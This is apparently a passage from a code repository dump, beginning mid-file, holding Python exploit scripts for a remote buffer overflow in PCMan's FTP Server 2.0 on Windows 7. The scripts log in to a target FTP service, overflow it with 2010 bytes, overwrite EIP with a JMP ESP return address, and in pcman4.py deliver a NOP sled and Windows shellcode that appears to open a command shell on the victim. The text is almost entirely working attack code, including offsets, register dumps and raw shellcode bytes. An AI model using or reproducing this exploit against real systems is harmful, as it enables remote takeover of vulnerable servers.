"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" 34 | 35 | #offset is exact match at 2010 36 | #EIP = "\xDB\xFC\x1C\x75" # 751CFCDB JMP ESP USER32.DLL 37 | #NOP = "\x90" * 10 38 | #the address is 0x0043410d 39 | #SHELLCODE =() 40 | print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit") 41 | print("[+] Version: V2.0") 42 | print("[+] Chako\n\n\n") 43 | 44 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 45 | s.connect(("11.11.11.9",21)) 46 | data = s.recv(1024) 47 | 48 | 49 | print("[-] Login to FTP Server...\n") 50 | s.send("USER " + USER + '\r\n') 51 | data = s.recv(1024) 52 | 53 | s.send("PASS " + PASSWD + '\r\n') 54 | data = s.recv(1024) 55 | 56 | 57 | 58 | print("[-] Sending exploit...\n") 59 | #s.send(PAYLOAD + EIP + NOP +SHELLCODE +'\r\n') 60 | s.send(PAYLOAD + RET + '\r\n') 61 | s.close() 62 | 63 | print("[!] Done! Exploit successfully sent\n") 64 | -------------------------------------------------------------------------------- /win7PCman/pcman4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # 4 | #################################################################### 5 | # 6 | # Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit 7 | # Date: 2013/6/26 8 | # Exploit Author: Chako 9 | # Vendor Homepage: http://pcman.openfoundry.org/ 10 | # Software Download Link: https://files.secureserver.net/1sMltFOsytirTG 11 | # Version: 2.0 12 | # Tested on: Windows 7 SP1 English 13 | # 14 | # EAX 00000000 15 | # ECX 00830A70 16 | # EDX 00000030 17 | # EBX 00000000 18 | # ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA 19 | # EBP 01F214A0 20 | # ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA 21 | # EDI 00000004 22 | # EIP 41414141 23 | # 24 | #################################################################### 25 | 26 | import socket 27 | import sys 28 | 29 | USER = "anonymous" 30 | PASSWD = "TEST" 31 | RET = "\xDB\xFC\x1C\x75" 32 | PAYLOAD = "A" * 2010 33 | #PAYLOAD = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" 34 | 35 | #offset is exact match at 2010 36 | #EIP = "\xDB\xFC\x1C\x75" # 751CFCDB JMP ESP USER32.DLL 37 | #NOP = "\x90" * 10 38 | #the address is 0x0043410d 39 | #SHELLCODE =() 40 | shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64" + 41 | "\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" + 42 | "\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c" + 43 | "\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" + 44 | "\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" + 45 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49" + 46 | "\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + 47 | "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" + 48 | "\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b" + 49 | "\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" + 50 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a" + 51 | "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77" + 52 | "\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" + 53 | "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" + 54 | "\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" + 55 | "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00" + 56 | "\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37" + 57 | "\x67\xff\xd5\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57" + 58 | "\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" + 59 | "\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" + 60 | "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + 61 | "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" + 62 | "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56" + 63 | "\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46" + 64 | "\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" + 65 | "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + 66 | "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" + 67 | "\x00\x53\xff\xd5") 68 | 69 | print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit") 70 | print("[+] Version: V2.0") 71 | print("[+] Chako\n\n\n") 72 | 73 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 74 | s.connect(("11.11.11.9",21)) 75 | data = s.recv(1024) 76 | 77 | 78 | print("[-] Login to FTP Server...\n") 79 | s.send("USER " + USER + '\r\n') 80 | data = s.recv(1024) 81 | 82 | s.send("PASS " + PASSWD + '\r\n') 83 | data = s.recv(1024) 84 | 85 | 86 | 87 | print("[-] Sending exploit...\n") 88 | #s.send(PAYLOAD + EIP + NOP +SHELLCODE +'\r\n') 89 | s.send(PAYLOAD + RET + "\x90" * 20 + shellcode + '\r\n') 90 | s.close() 91 | 92 | print("[!] Done! Exploit successfully sent\n") 93 | --------------------------------------------------------------------------------